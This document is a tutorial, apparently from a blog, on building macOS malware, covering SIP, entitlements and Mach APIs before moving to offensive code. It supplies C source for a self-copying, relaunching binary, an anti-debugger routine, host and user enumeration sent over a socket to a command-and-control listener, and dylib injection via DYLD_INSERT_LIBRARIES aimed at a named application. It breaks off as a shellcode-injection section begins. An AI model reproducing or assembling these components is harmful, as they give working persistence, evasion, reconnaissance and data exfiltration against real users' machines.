macOS Malware Development I

09 Mar 2024

This piece offers a structured approach to analyzing and working with macOS internals with an eye on malware development. We begin with an overview of the macOS architecture, focusing on key components such as the Mach API and kernel. Next, we dive into fundamental system calls.

The guide concludes with a step-by-step demonstration of code injection and persistence techniques. As always, we provide a brief overview of the inner workings of the code, followed by a few examples, and then a detailed explanation.

Let’s start by understanding the macOS architecture and its security features. We’ll then delve into the internals, covering key elements like the Mach API and kernel, and we’ll walk through some basic system calls and examples that are easy to understand. Next, we’ll introduce a dummy malware. Later on, we’ll explore code injection techniques and how they’re utilized in malware. We’ll also touch on persistence methods.

To conclude, we’ll demonstrate a basic implementation of shellcode injection and persistence. Throughout, we’ll provide a detailed, step-by-step breakdown of the code and techniques involved.

A little background from the internet

The macOS kernel (XNU) is a hybrid that merges the Mach microkernel with components of the FreeBSD monolithic kernel. The Mach microkernel provides core features like interprocess communication (IPC) using message passing, task management with separate address spaces, and default servers for services like virtual memory and clock management.

To address limitations such as the lack of user management, file systems, and networking, macOS integrates FreeBSD’s kernel components on top of Mach. These additions enable a fully functional operating system while avoiding excessive IPC overhead by running both kernels in the same privileged address space. Importantly, the Mach API is consistent for both kernel code and user processes, maintaining compatibility and easy interaction.


Before starting macOS development, it’s important to understand the system’s core security protections, especially System Integrity Protection (SIP).

SIP is a key security feature that protects important system files, directories, and processes from being changed or tampered with even by applications running as root. It blocks write access to certain system areas and adds extra checks for system extensions and kernel drivers. For example, kernel extensions must be signed by Apple or an approved developer with a valid Developer ID. This ensures that only trusted extensions can load, strengthening the system’s overall security.

SIP

With SIP (System Integrity Protection) enabled, the “restricted” flag on certain directories (visible with ls -lO) shows which areas are protected. However, SIP’s protection doesn’t always extend to subdirectories within those flagged locations.

To handle this, macOS uses firmlinks, special symbolic links protected by SIP. They work like regular symlinks but maintain SIP protection, allowing access to specific directories without breaking compatibility. Firmlinks make it possible to create usable links in protected paths like /usr, /bin, /sbin, and /etc.

This balances security and flexibility. For example, /usr/local is accessible via a firmlink, allowing developers to install and manage software there while still keeping the system secure.

Now, onto entitlements: permissions granted to applications on macOS that define their access and capabilities within the system. Entitlements control how an app interacts with system resources such as the network, file system, hardware, and user privacy-related data. By assigning specific entitlements, macOS ensures apps have the permissions needed to function while protecting system integrity and user privacy.

Entitlements are typically stored in a separate entitlements file that gets embedded in the app’s code signature, not directly in the Info.plist. The Info.plist holds general app metadata and configuration, while entitlements are part of the signed binary.

An entitlement looks like this in the entitlements file:

<key>com.apple.security.network.client</key>
<true/>

This example gives the app permission to act as a network client, allowing access to network resources. To view an app’s entitlements, you can run:

codesign --display --entitlements - /path/to/foo.app

Entitlements vary depending on what the app needs access to. By enforcing them, macOS ensures apps operate within defined boundaries, enhancing system security, privacy, and controlled resource access.

Info.plist

Now, let’s talk about property list (plist) files, a common file format on macOS used to store structured data like configuration settings, preferences, and metadata. Plist files use a hierarchical key-value structure and support various data types. They can be stored in XML or binary formats.

On macOS, plist files are widely used for storing application metadata, entitlements, sandbox settings, and code signing information.

Plist files support these common data types: strings, numbers (integer and real), booleans, dates, binary data, arrays, and dictionaries.

An entitlements plist, for example, looks like this:

<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
  <dict>
    <key>com.apple.security.app-sandbox</key>
    <true/>
    <key>com.apple.security.files.user-selected.read-only</key>
    <true/>
    <key>com.apple.security.network.client</key>
    <true/>
  </dict>
</plist>

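In this example, com.apple.security.app-sandbox enables the App Sandbox, com.apple.security.files.user-selected.read-only grants read-only access to files the user explicitly selects, and com.apple.security.network.client allows outgoing network connections.

These entitlements define what the app can do within the sandbox environment. You can convert and view plist files in different formats using plutil: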

plutil -convert xml1 /Applications/Safari.app/Contents/Info.plist -o -
plutil -convert json /Applications/Safari.app/Contents/Info.plist -o -

Overall, plist files are essential in macOS for managing entitlements, sandboxing, code signing, and other configurations. That covers the basics. There’s more to explore, like Gatekeeper, sandboxing internals, and app bundles, but these are the key mechanisms developers should know. Next, we’ll dive deeper into macOS internals.


Mach APIs

In macOS, a traditional Unix “process” is redefined into two components: tasks and threads. A task represents a unit that contains resources such as virtual address space, IPC rights, and one or more threads of execution. Threads are the fundamental units of execution managed by the kernel. Depending on the context, threads may operate at the kernel level as Mach threads or at the user level as pthreads, with each mode serving distinct purposes within the system.

Inter-process communication in macOS relies on ports, a mechanism where tasks exchange structured messages asynchronously. Ports are uniquely identified within a task, ensuring secure communication between processes while maintaining kernel-level oversight.

Mach’s virtual memory subsystem is built around address maps and memory objects. Memory objects work as containers for data mapped into a task’s address space, which the kernel manages to optimize performance. Separately, exception ports assigned to tasks and threads allow custom exception handling, where a handler can manage, suspend, or terminate a thread as needed.

Mach also provides system calls for essential operations, from retrieving system information to manipulating other tasks, which is what makes code injection possible. These calls are serviced by the kernel and are typically wrapped by user-friendly C library functions. So yes, familiar Unix territory.

Let’s cover the basics of Mach system calls, including retrieving system information and performing code injection.

A system call is a kernel function triggered from user space to request core system services. Common tasks include writing to a file descriptor or terminating a process. On macOS, most system calls are wrapped by C library functions, making them easier to use in applications.

The Mach IPC Interface reference and Apple’s documentation describe a Mach call that is handy for getting basic information about the host: host_info(). It reports details such as the maximum and available CPU counts, the physical and logical CPU counts, the memory size, and the maximum memory size.

Like many Mach info calls, host_info() requires a flavor argument to specify the type of information you want. Its function signature looks like this:

kern_return_t host_info(host_t host, host_flavor_t flavor,
                        host_info_t host_info,
                        mach_msg_type_number_t *host_info_count);

Besides host_info(), other calls like host_kernel_version(), host_get_boot_info(), and host_page_size() can be employed to access miscellaneous system details.

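#include <stdio.h>
#include <stdlib.h>
#include <mach/mach.h>
#include <mach/mach_error.h>

/* Assumed definition (the article does not show it): checks the local `kr`
   and exits with `retval` when a Mach call fails. */
#define EXIT_ON_MACH_ERROR(msg, retval) \
    if (kr != KERN_SUCCESS) { mach_error(msg ":", kr); exit((retval)); }

int main(void) {
    kern_return_t kr; /* the standard return type for Mach calls */
    mach_port_t myhost;
    kernel_version_t kversion; /* char[512], the size host_kernel_version() expects */
    host_basic_info_data_t hinfo;
    mach_msg_type_number_t count;
    vm_size_t page_size;
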

    // Retrieve System Information
    printf("Retrieving System Information...\n");

    // Get send rights to the name port for the current host
    myhost = mach_host_self();

    // Get kernel version
    kr = host_kernel_version(myhost, kversion);
    EXIT_ON_MACH_ERROR("host_kernel_version", kr);

    // Get basic host information
    count = HOST_BASIC_INFO_COUNT; // size of the buffer
    kr = host_info(myhost, HOST_BASIC_INFO, (host_info_t)&hinfo, &count);
    EXIT_ON_MACH_ERROR("host_info", kr);

    // Get page size
    kr = host_page_size(myhost, &page_size);
    EXIT_ON_MACH_ERROR("host_page_size", kr);

    printf("Kernel Version: %s\n", kversion);
    printf("Maximum CPUs: %d\n", hinfo.max_cpus);
    printf("Available CPUs: %d\n", hinfo.avail_cpus);
    printf("Physical CPUs: %d\n", hinfo.physical_cpu);
    printf("Maximum Physical CPUs: %d\n", hinfo.physical_cpu_max);
    printf("Logical CPUs: %d\n", hinfo.logical_cpu);
    printf("Maximum Logical CPUs: %d\n", hinfo.logical_cpu_max);
    printf("Memory Size: %llu MB\n", (unsigned long long)(hinfo.memory_size >> 20));
    printf("Maximum Memory: %llu MB\n", (unsigned long long)(hinfo.max_mem >> 20));
    printf("Page Size: %u bytes\n", (unsigned int)page_size);

    // Clean up and exit
    mach_port_deallocate(mach_task_self(), myhost);
    exit(0);
}
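For comparison, a couple of the same facts can be read without touching Mach ports at all. The sketch below is not part of the original program; it uses sysconf(), and the helper names (query_page_size, query_online_cpus, print_basic_host_facts) are made up for illustration. Note that _SC_NPROCESSORS_ONLN is a widely available extension (macOS, Linux, the BSDs) rather than strict POSIX.

```c
#include <assert.h>
#include <stdio.h>
#include <unistd.h>

/* Page size in bytes via sysconf(); returns -1 on failure. */
long query_page_size(void) {
    return sysconf(_SC_PAGESIZE);
}

/* Number of processors currently online; returns -1 on failure.
   _SC_NPROCESSORS_ONLN is a common extension, not strict POSIX. */
long query_online_cpus(void) {
    return sysconf(_SC_NPROCESSORS_ONLN);
}

/* Print both values to the given stream (hypothetical helper). */
void print_basic_host_facts(FILE *out) {
    assert(out != NULL);
    fprintf(out, "Page Size: %ld bytes\n", query_page_size());
    fprintf(out, "Online CPUs: %ld\n", query_online_cpus());
}
```

Calling print_basic_host_facts(stdout) from main() prints the two values. The Mach route remains the richer one, since host_info() also reports physical versus logical CPU counts and memory sizes in a single call.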

The basic code so far just pulls system information, like the kernel version — simple and harmless. But to dive deeper into system calls, let’s explore something more aggressive, similar to malware behavior. For example, writing a copy of the executable to /usr/bin/ or /Library/.

To perform actions like this, we need task-level operations since controlling another process or accessing system-level processes requires interacting with Mach tasks. Relevant Mach system calls include pid_for_task(), task_for_pid(), task_name_for_pid(), and mach_task_self(). These functions allow converting between Mach task ports and Unix PIDs.

However, most of these calls are heavily restricted on macOS due to security features like SIP (System Integrity Protection), entitlements, and UID checks. They bypass the standard capability model and are not part of the public API. Usage typically requires elevated privileges, such as running as root or being part of the procview group.

For instance, task_for_pid() is blocked by SIP when targeting system binaries. If it worked, it would give full control over the target process, allowing anything from memory access to code injection.

For this example, we’ll stick to mach_task_self(), which refers to the current process and usually doesn’t require special privileges.

void hide_process() {
    mach_port_t task_self = mach_task_self();
    kern_return_t kr;

    // Set exception ports to disable debuggers.
    kr = task_set_exception_ports(task_self, EXC_MASK_ALL, MACH_PORT_NULL, EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES, THREAD_STATE_NONE);
    if (kr != KERN_SUCCESS) {
        printf("Uh-oh: Failed to set exception ports: %s\n", mach_error_string(kr));
        exit(EXIT_FAILURE);
    }

    printf("Shhh... Process is now hidden\n");
}

The function retrieves the current task port using mach_task_self(). In Mach, the task port represents the process itself and provides control over the task when a valid send right is held.

It then calls task_set_exception_ports() to modify the task’s exception handling behavior. By setting all exceptions (EXC_MASK_ALL) to MACH_PORT_NULL, the process clears any external exception handlers — including potential debuggers that rely on intercepting exceptions.

However, this doesn’t truly hide the process or prevent monitoring via other means like ps, top, or system APIs. It mainly makes standard debugging harder by breaking the exception handling chain.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <mach/mach.h>
#include <mach/mach_init.h>
#include <mach/task.h>
#include <limits.h>

#define BUF_SIZE 4096
#define PERMISSIONS S_IRUSR | S_IWUSR | S_IXUSR
#define MALWARE_NAME "mw"
#define FLAG_FILE "/tmp/s_flag"

// new loca
void copy_self(const char * self,
  const char * dest_path) {
  char buf[BUF_SIZE];
  size_t bytes;

  FILE * self_file = fopen(self, "rb");
  FILE * dest = fopen(dest_path, "wb");

  while ((bytes = fread(buf, 1, BUF_SIZE, self_file)) > 0) {
    fwrite(buf, 1, bytes, dest);
  }

  fclose(self_file);
  fclose(dest);

  chmod(dest_path, PERMISSIONS);
}

void hide_process() {
  mach_port_t task = mach_task_self();
  task_set_exception_ports(task, EXC_MASK_ALL, MACH_PORT_NULL, EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES, THREAD_STATE_NONE);
}

int main(int argc, char * argv[]) {
  char dest_path[PATH_MAX];
  const char * home_dir = getenv("HOME");

  snprintf(dest_path, PATH_MAX, "%s/%s", home_dir, MALWARE_NAME);

  // if it's the one
  if (access(FLAG_FILE, F_OK) != 0) {
    // only if it doesn't already exist
    if (access(dest_path, F_OK) != 0) {
      copy_self(argv[0], dest_path);
    }

    // we need a flag to indicate the first replica has executed we can't enter a loop.
    FILE * flag_file = fopen(FLAG_FILE, "w");
    fclose(flag_file);
  } else {
    // Exit if it is not the first replica
    return EXIT_SUCCESS;
  }

  printf("Hello, World!\n");

  hide_process();

  // run.
  if (fork() == 0) {
    execl(dest_path, dest_path, NULL);
  }

  return EXIT_SUCCESS;
}

This sample has two parts. The copying mechanism, copy_self(), duplicates the running executable to a new location. Self-replication of this kind is a fundamental step in how malware spreads or maintains persistence on a system. The second part tracks execution with a flag file: without it, every copy that runs would copy and launch itself again, ending in an infinite loop. The flag file (/tmp/s_flag) marks that the first replica has already executed, so later runs exit immediately.

This technique is simple. It ensures that even if the original process exits or hides, the new copy of the program continues running. This is how many types of malware operate. They don’t rely on just one process. Instead, they make sure that if one process is removed or hidden, another one takes its place.

Right now, we’re keeping things simple and easy to understand. But in the next section, we’ll dive deeper and expand on this idea. We’ll look at how to make the program more persistent, spread, and evade detection.

For now, keep in mind that this code is basic but can be dangerous if not handled carefully. If you want to test it, don’t run it on your main machine. Alright.

_main:
0000000100003d20         push       rbp
0000000100003d21         mov        rbp, rsp
0000000100003d24         sub        rsp, 0x440
0000000100003d2b         mov        rax, qword [___stack_chk_guard_100004000]   ; ___stack_chk_guard_100004000
0000000100003d32         mov        rax, qword [rax]
0000000100003d35         mov        qword [rbp+var_8], rax
0000000100003d39         mov        dword [rbp+var_414], 0x0
0000000100003d43         mov        dword [rbp+var_418], edi
0000000100003d49         mov        qword [rbp+var_420], rsi
0000000100003d50         lea        rdi, qword [aHome]                          ; argument "name" for method imp___stubs__getenv, "HOME"
0000000100003d57         call       imp___stubs__getenv                         ; getenv
0000000100003d5c         mov        qword [rbp+var_428], rax
0000000100003d63         lea        rdi, qword [rbp+var_410]                    ; argument #1 for method imp___stubs____snprintf_chk
0000000100003d6a         mov        r9, qword [rbp+var_428]
0000000100003d71         mov        ecx, 0x400                                  ; argument #4 for method imp___stubs____snprintf_chk
0000000100003d76         xor        edx, edx                                    ; argument #3 for method imp___stubs____snprintf_chk
0000000100003d78         lea        r8, qword [aSs]                             ; argument #5 for method imp___stubs____snprintf_chk, "%s/%s"
0000000100003d7f         lea        rax, qword [aMw]                            ; "mw"
0000000100003d86         mov        rsi, rcx                                    ; argument #2 for method imp___stubs____snprintf_chk
0000000100003d89         mov        qword [rsp+0x440+var_440], rax
0000000100003d8d         mov        al, 0x0
0000000100003d8f         call       imp___stubs____snprintf_chk                 ; __snprintf_chk
0000000100003d94         lea        rdi, qword [aTmpsflag]                      ; argument "path" for method imp___stubs__access, "/tmp/s_flag"
0000000100003d9b         xor        esi, esi                                    ....

0000000100003dc2         mov        rax, qword [rbp+var_420]
0000000100003dc9         mov        rdi, qword [rax]
0000000100003dcc         lea        rsi, qword [rbp+var_410]
0000000100003dd3         call       _copy_self                                  ; _copy_self

Here we put our little program into a debugger, and we can observe its behavior step by step. The program checks for the existence of a specific flag file (/tmp/s_flag). If the file does not exist, the program proceeds to copy itself to the user’s home directory (e.g., /Users/username/mw).

The Naive Way

After infecting a new host, it’s important for the malware to notify us of its presence by sending system information back to a Command & Control (C2) server. Although connecting to a C2 server right away might seem like an amateurish approach for malware, especially at the beginning, it’s a good starting point for exploring macOS. The information we collect could include details such as the system name, release version, machine architecture, hardware model, user ID, home directory, and more. To retrieve and modify system information, we can use Apple’s sysctlbyname function, which allows us to query specific system details directly from the kernel, such as the cache line size.

For user-related data, we typically use standard POSIX functions like getpwuid(), which give us access to user information. If we want to get the hardware model, instead of using "hw.cachelinesize", we would query "hw.model" in the sysctlbyname function.

Now, let’s go a step further and gather even more information about the infected system. The reason for switching from the first approach to this one is to demonstrate how we access user-related data using POSIX interfaces. However, if you’d like to include the hardware model in the first example, you can do so by using the following code:

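char model[64]; /* buffer size is an arbitrary choice */
size_t len = sizeof(model); /* sysctlbyname() takes a size_t length */
if (sysctlbyname("hw.model", model, &len, NULL, 0) != 0) { /* returns 0 or -1, not a kern_return_t */
    perror("sysctl hw.model");
    exit(1);
}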

Plus, it’s important to gather the kernel version, as this could help identify known vulnerabilities and provide a way to escalate privileges. Here’s an example of how we can use the sysctlbyname function to fetch the kernel version:

size_t len = BUF_SIZE;
if (sysctlbyname("kern.version", &kernel_version, &len, NULL, 0) == 0) {
    send_data(sockfd, "\nKernel Version: ");
    send_data(sockfd, kernel_version);
}

We also want to dump and send more detailed information about the infected host, such as the system name, architecture, login shell, home directory, and any other useful data that could help us exploit the system further or maintain access. Functions like uname, getpwuid, and getgrgid can help retrieve this information.

// Collect system information
void sys_info(RBuff *report) {
    struct utsname u; 
    if (uname(&u) == 0) {
        report->pointer += snprintf(report->buffer + report->pointer, sizeof(report->buffer) - report->pointer, 
            "[System Info]\nOS: %s\nVersion: %s\nArch: %s\nKernel: %s\n\n", u.sysname, u.version, u.machine, u.release);
    }
}

// Collect user information
void user_info(RBuff *report) {
    struct passwd *user = getpwuid(getuid()); 
    if (user) 
        report->pointer += snprintf(report->buffer + report->pointer, sizeof(report->buffer) - report->pointer, 
            "[User Info]\nUsername: %s\nHome: %s\n\n", user->pw_name, user->pw_dir);
}
....
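One detail in the snippet above deserves a closer look: snprintf() returns the length it would have written, so adding its return value to report->pointer can push the offset past the end of the buffer once the report fills up. The following is a minimal sketch of a bounds-checked variant. The RBuff layout is an assumption (the article does not show its definition), and rbuff_init and rbuff_appendf are hypothetical helper names.

```c
#include <assert.h>
#include <pwd.h>
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#include <sys/utsname.h>
#include <unistd.h>

/* Assumed layout: a fixed buffer plus the number of bytes used so far. */
typedef struct {
    char   buffer[1024];
    size_t pointer;
} RBuff;

/* Reset the report to an empty string. */
void rbuff_init(RBuff *r) {
    assert(r != NULL);
    memset(r, 0, sizeof(*r));
}

/* Append formatted text. Returns 0 on success, or -1 if the text did not
   fit, in which case the report is left as it was before the call. */
int rbuff_appendf(RBuff *r, const char *fmt, ...) {
    assert(r != NULL && r->pointer < sizeof(r->buffer));
    size_t room = sizeof(r->buffer) - r->pointer;
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(r->buffer + r->pointer, room, fmt, ap);
    va_end(ap);
    if (n < 0 || (size_t)n >= room) {
        r->buffer[r->pointer] = '\0'; /* discard the partial write */
        return -1;
    }
    r->pointer += (size_t)n;
    return 0;
}

/* Collect system information; returns -1 if uname() fails or the text does not fit. */
int sys_info(RBuff *report) {
    struct utsname u;
    if (uname(&u) != 0)
        return -1;
    return rbuff_appendf(report,
        "[System Info]\nSystem: %s\nRelease: %s\nArchitecture: %s\nKernel: %s\n\n",
        u.sysname, u.release, u.machine, u.version);
}

/* Collect user information; returns -1 if there is no passwd entry or the text does not fit. */
int user_info(RBuff *report) {
    struct passwd *user = getpwuid(getuid());
    if (user == NULL)
        return -1;
    return rbuff_appendf(report, "[User Info]\nUsername: %s\nHome: %s\n\n",
                         user->pw_name, user->pw_dir);
}
```

The design choice here is to treat truncation as a failure rather than silently keeping half a line, so report->pointer always equals the length of the string in the buffer.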

So, the function is pretty self-explanatory; it simply provides a snapshot of the system and user environment, which is crucial for gathering information on potential targets. However, since malware typically only has one chance for infection, it needs to be self-reliant before attempting to Phone Home. This is why the approach of using a dummy malware, primarily for testing and exploring options before developing an actual malware, is essential.

Nevertheless, deploying a dummy malware still provides attackers with a significant amount of information that could be leveraged for subsequent targeted attacks or exploiting vulnerabilities, whether in the kernel or user land. The malware could be multi-staged to ensure stealth and a low profile. This code can act as stage 1 of an attack, proliferating itself in the system, waiting to activate stage 2, and so on. These types of attacks are advanced and hard to detect, especially in environments like macOS, where malware can remain undetected for years.

Another type of information gathering employed by macOS malware, as seen in some reports, involves ‘LOLBins’ (Living off the Land Binaries). You can program the malware to simply execute /usr/sbin/system_profiler -nospawn -detailLevel full, for example.

This command alone saves the trouble and provides all the information about a host that an attacker can gather. However, the catch is that such commands are visible and can be easily flagged. Despite this, it remains an easy and effective method for malware to extract details from the infected host.

Alright, so how do we transmit the data? We use a socket. This API allows us to send data to the connected endpoint, which in this case is the Command & Control server. Data is sent in the form of strings. To ensure that the data is properly formatted and transmitted over the socket to the C2 server, we rely on functions like send() for sending data, and file I/O functions such as popen() and fgets() for reading command output before sending it. It’s pretty simple.

The C2 server is also straightforward, designed solely for handling incoming connections. It won’t have any protection mechanisms to hide itself from the system where it’s running, but this server is basic for demonstration purposes only. I recommend implementing encryption, setting up a database to organize data, and generating a temporary ID to associate with each instance.

The extraction module (ext) starts an autonomous thread listening for incoming connections from malware instances. Once connected, the module simply prints the content of the incoming connection (which is the information extracted by the client) to the standard output.

// The server will keep listening for incoming connections indefinitely
while (1) {
    // Accept a new connection from a client
    cltlen = sizeof(cltaddr);
    cltfd = accept(dexft_fd, (struct sockaddr *) &cltaddr, &cltlen);

    // Check if the accept call was successful
    if (cltfd < 0) {
        // If accept failed, print an error message and continue listening
        printf("Failed to accept incoming connection, %d\n", cltfd);
        continue;
    }

    // Print out information about the connected client
    printf("Collecting data from client %s:%d...\n", inet_ntoa(cltaddr.sin_addr), ntohs(cltaddr.sin_port));

    // Receive data from the client and process it
    while ((br = recv(cltfd, buf, BUF_SIZE, 0)) > 0) {
        // Write the received data to the standard output
        fwrite(buf, 1, br, stdout);
    }

    // Check if an error occurred during data reception
    if (br < 0) {
        printf("ERROR: Failed to receive data from client!\n");
    }

    // Close the client socket
    close(cltfd);
}

return NULL;

As you can see, the code itself is quite simple yet functional. Once the client is executed, the server collects data from the connected client, then closes the connection before resuming listening for new connections:

~/Desktop/i/ > ./ctwo
Initializing Data Extraction...
Listening...
Incoming data from the client 0.0.0.0:00000...
=== System Information Report ===

[System Information]
System: Darwin
Release: 22.6.0
Architecture: x86_64
Kernel: Darwin Kernel Version 22.6.0: Tue Dec 19 10:14:25 PST 2023; root:xnu-8790.41.0~4/RELEASE_X86_64

[User Information]
User: jdoe
Group: staff
Home Directory: /Users/jdoe

[Network Information]
Interface: en0 | IPv4: 192.168.1.10
Interface: en0 | IPv6: fe80::1c2b:e3ff:fe40:923b
Interface: awdl0 | IPv6: fe80::b2b1:29ff:fe76:a865
Interface: utun2 | IPv6: fde8:1d9c:2237:0:1c2b:e3ff:fe40:923b

[Environment Variables]
PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin
SHELL=/bin/zsh
HOME=/Users/jdoe
TERM=xterm-256color
USER=jdoe
LANG=en_US.UTF-8

[CPU Information]
CPU: Apple M1 Max

[Disk Usage]
Total: 476839 MB | Free: 324102 MB

[Running Processes]
PID: 234 | Process: /System/Library/CoreServices/WindowServer
PID: 514 | Process: /Applications/Safari.app/Contents/MacOS/Safari
PID: 1001 | Process: /Applications/Spotify.app/Contents/MacOS/Spotify
PID: 1147 | Process: /Applications/Terminal.app/Contents/MacOS/Terminal
PID: 1302 | Process: /usr/sbin/sshd

=== End of Report ===

Obviously, this will get flagged within seconds if there’s a firewall in place. Why? Because the behavior here is a dead giveaway of malware—executing commands, establishing connections, and sending system information while waiting for further instructions from a remote server. The network traffic alone is a red flag. Plus, transmitting detailed information about the system right after connecting doesn’t exactly scream “legitimate activity.” Instead, it’s more likely to raise suspicion, especially if it’s not limited to necessary data but includes a full host enumeration and other detailed system information.

The good news is that most Mac users think they’re safe by default, which means they don’t consider the possibility of sophisticated malware sneaking by undetected.

Now, if this were part of a targeted attack, things would be different. With a bit of obfuscation, maybe polymorphic code, and advanced covert communication channels (which we’ll get into later), this would be much harder to spot. But for now, this simple example serves as a way to demonstrate how dummy malware works and how it can be a useful learning tool before moving on to more advanced malware development. Next, we’ll dive into a topic I find quite interesting. Yes, you guessed it:

Code Injection

Code injection could easily fill its own article (see the resources at the end). For now, let’s focus on two effective techniques. The first is injection through an environment variable, DYLD_INSERT_LIBRARIES.

With it, users can preload dynamic libraries into apps. Both devs and attackers can inject code into a process at launch without changing the original executable. It’s used to intercept function calls, manipulate behavior, or add malicious features. Essentially, it’s a colon-separated list of dylibs loaded before the app’s own, which also allows testing new modules in existing libraries.

In short, it loads specified dylibs before the program, injecting a dylib into the app. Example:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor))

void foo() {
  printf("Dynamic library injected! \n");
  system("/bin/bash -c 'echo Library injected!'");
}

Here, we have foo(), which prints a success message when the library is injected, along with a system command that runs a shell to echo the same thing.

The __attribute__((constructor)) ensures the function runs before the app’s main function, into which we injected the dylib. Piece of cake, right? But how do we identify binaries vulnerable to environment variable injection? We’ll cover that later. For now, let’s try it on one of our previous programs. Just compile and run the code like any other.
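As an aside, the constructor behaviour itself can be checked without any dylib. The sketch below is a single-file illustration, not the article’s payload: a constructor sets a flag, and any code that runs later (including main) can see that it already fired. The names early_init, constructor_ran, and report_constructor are hypothetical, and the attribute is a GCC/Clang extension.

```c
#include <assert.h>
#include <stdio.h>

/* Set by the constructor, read by code that runs later. */
static int g_ctor_ran = 0;

/* Runs when the image is loaded, before main() is entered. */
__attribute__((constructor))
static void early_init(void) {
    g_ctor_ran = 1;
}

/* Returns 1 if the constructor has already executed. */
int constructor_ran(void) {
    return g_ctor_ran;
}

/* Print the result to the given stream (hypothetical helper). */
void report_constructor(FILE *out) {
    assert(out != NULL);
    fprintf(out, "constructor ran before first use: %s\n",
            constructor_ran() ? "yes" : "no");
}
```

Calling report_constructor(stdout) as the first statement of main() reports that the constructor has already run. The same ordering holds for a constructor inside a preloaded dylib.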

~ > gcc -dynamiclib inject.c -o inject.dylib

~ > DYLD_INSERT_LIBRARIES=inject.dylib ./foo
Dynamic library injected!
Library injected!

Et voilà! When the target is vulnerable, the system loads any dylibs specified in the DYLD_INSERT_LIBRARIES environment variable before the main program loads, effectively injecting a dylib into the application. This could potentially lead to privilege escalation, but not so fast on the Apple platform. As of macOS 10.14, third-party developers can opt into a “Hardened Runtime,” which prevents dylib injection using this technique.

Reference: Hardened Runtime

In simple terms, injection still works if the application doesn’t have the Hardened Runtime enabled: dyld honors DYLD_INSERT_LIBRARIES and loads the listed dylibs. When the binary is signed with the Hardened Runtime, dyld ignores these environment variables unless the developer has explicitly opted back in with the appropriate entitlements.

For example, trying to run this on Safari.app wouldn’t work because it’s protected by a hardened runtime and doesn’t have the necessary entitlement.

A missing entitlement doesn’t tell us whether an app is hardened, though, because the Hardened Runtime is a code-signing flag rather than an entitlement. After checking, I found VeraCrypt version 1.24. The version number alone doesn’t make it immune to dylib injection: if VeraCrypt doesn’t use the Hardened Runtime (which it seems it doesn’t here), it’s still vulnerable.

Let’s get straight to it: DYLD_INSERT_LIBRARIES. If VeraCrypt doesn’t have a hardened runtime, you can inject a dylib into it. This allows code execution in the app’s process and, depending on permissions, could escalate privileges.

With VeraCrypt 1.24 not hardened, it’s more likely vulnerable, though macOS security features and the environment may provide some defense.

Under the Hardened Runtime (macOS 10.14 and later), the technique only works if the app carries an entitlement that re-enables it, such as com.apple.security.cs.allow-dyld-environment-variables. If the app isn’t protected, try injecting with DYLD_INSERT_LIBRARIES; if it works, you can inject into VeraCrypt.

I’ll use this as an example for the article. Let’s attempt the injection:

#include <stdio.h>
#include <syslog.h>

__attribute__((constructor))
static void customConstructor(int argc, const char **argv)
{
    (void)argc; /* unused */
    printf("Foo!\n");
    syslog(LOG_ERR, "Dylib injection successful in %s\n", argv[0]);
}

So, we simply print “Foo!” and log a message using the syslog() function, which records that the dynamic library (dylib) was injected successfully, along with the name of the program. Let’s try it. If the “Foo!” line and the syslog entry appear, we’ve successfully loaded the library.

Reference: DYLD_INSERT_LIBRARIES DYLIB injection

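Environment variables only help at launch. Injecting into a process that is already running means creating a thread inside it through the Mach APIs, and a bare Mach thread is not enough: macOS expects threads to be created using BSD APIs, with both the Mach and pthread structures set up properly, especially since macOS 10.14 introduced changes.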

To solve this, I found a piece of code called inject.c. I also recommend reading the Mac Hacker’s Handbook for great insights and examples of interprocess code injection.

Reference: inject.c

From what I’ve gathered, transitioning from Mach thread APIs to pthread APIs on macOS, especially with thread initialization, is tricky. However, the _pthread_create_from_mach_thread function offers a solid solution for initializing pthread structures from Mach threads, ensuring compatibility and correct thread behavior across macOS versions.

For those curious, I’ve added examples showing how to inject code to call dlopen and load a dylib into a remote Mach task: 

https://gist.github.com/knightsc/45edfc4903a9d2fa9f5905f60b02ce5a https://gist.github.com/vocaeq/fbac63d5d36bc6e1d6d99df9c92f75dc

Alright, that was cool. Let’s check the second technique. It’s similar to process injection on Windows, where one process runs code inside another. On Windows, this is mostly used to evade AV, alongside techniques like DLL hijacking. On macOS, the impact is larger because of the permission differences between apps.

In the classic Unix model, processes run as a specific user. Each file has an owner, group, and flags for read/write/execute permissions. Processes running as the same user share the same permissions—there’s no boundary between them. One process could attach to another as a debugger, reading or writing its memory or registers. Root is the exception, having unrestricted access to files and processes, and can access all data on disk or in RAM.
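
As a rough illustration of the classic model described above, the sketch below reads a file’s owner and permission bits and applies the same-user rule. The helper name owner_can_write is made up for this example, and the check deliberately ignores group bits, ACLs, and SIP.

```python
import os
import stat
import tempfile

def owner_can_write(st: os.stat_result, uid: int) -> bool:
    """Classic Unix check: root always wins; otherwise the caller must own
    the file and the owner-write bit must be set. (Hypothetical helper;
    ignores group/other bits, ACLs, and SIP.)"""
    if uid == 0:
        return True
    return st.st_uid == uid and bool(st.st_mode & stat.S_IWUSR)

# Create a scratch file and give it rw-r----- permissions.
fd, path = tempfile.mkstemp()
os.close(fd)
os.chmod(path, 0o640)
st = os.stat(path)

mode_string = stat.filemode(st.st_mode)  # symbolic form of the mode bits
print(mode_string, "owner uid:", st.st_uid)
print("current user can write:", owner_can_write(st, os.getuid()))
os.remove(path)
```

Any process running under the owning uid passes this check, which is exactly why the classic model offers no boundary between a user’s own processes.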

macOS followed this model until the introduction of… yep, SIP (System Integrity Protection).

macOS Shellcode Development

Alright, we’ll write a simple shellcode injection where the host process injects shellcode into a remote process’s memory. But first, let’s write some shellcode for testing.

Writing 64-bit assembly on macOS is a bit different from writing it for ELF targets. Here the output format is Mach-O, but for simplicity, we’ll stick with x86_64 and let the linker produce the Mach-O executable later.

Reference: Writing 64 Bit Assembly on Mac OS X

A basic Hello World program uses two sections: .data for storing data and .text for executable code. Here _main is the entry point, and it immediately jumps to the trick label. There, a call instruction transfers control to the continue subroutine and, as a side effect, pushes the address of the bytes that follow it, which is our “Hello World!” string. continue pops that address into rsi, issues a write syscall to print the string, and then an exit syscall to end the program.

trick.s

section .data
